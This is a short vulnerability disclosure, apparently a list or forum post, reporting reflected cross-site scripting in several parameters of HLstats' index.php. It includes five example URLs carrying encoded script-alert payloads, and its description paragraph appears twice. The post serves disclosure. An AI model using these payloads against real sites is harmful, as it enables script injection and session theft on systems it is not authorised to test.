Input passed to multiple parameters in index.php isn't properly
sanitised before being returned to the user. This can be exploited to
execute HTML and script code in a user's browser session in context of
an affected site with limitation of ' and ".
This may also affect prior versions.
Input passed to multiple parameters in index.php isn't properly
sanitised before being returned to the user. This can be exploited to
execute HTML and script code in a user's browser session in context of
an affected site with limitation of ' and ".
This may also affect prior versions.
Examples:
http://[host]/index.php?mode=players&game=%3Cscript%3Ealert(123)%3C/scri
pt%3E
http://[host]/index.php?mode=weaponinfo&weapon=%3Cscript%3Ealert(123)%3C
/script%3E&game=tfc
http://[host]/index.php?mode=search&q=whatever&st=%3Cscript%3Ealert(123)
%3C/script%3E&game=tfc
http://[host]/index.php?mode=actioninfo&action=%3Cscript%3Ealert(123)%3C
/script%3E&game=tfc
http://[host]/index.php?mode=mapinfo&map=%3Cscript%3Ealert(123)%3C/scrip
t%3E&game=tfc
(instead of 'tfc' you should use the game, HLstats is configurated for)
kind regards
MC.Iglo
[ reply ]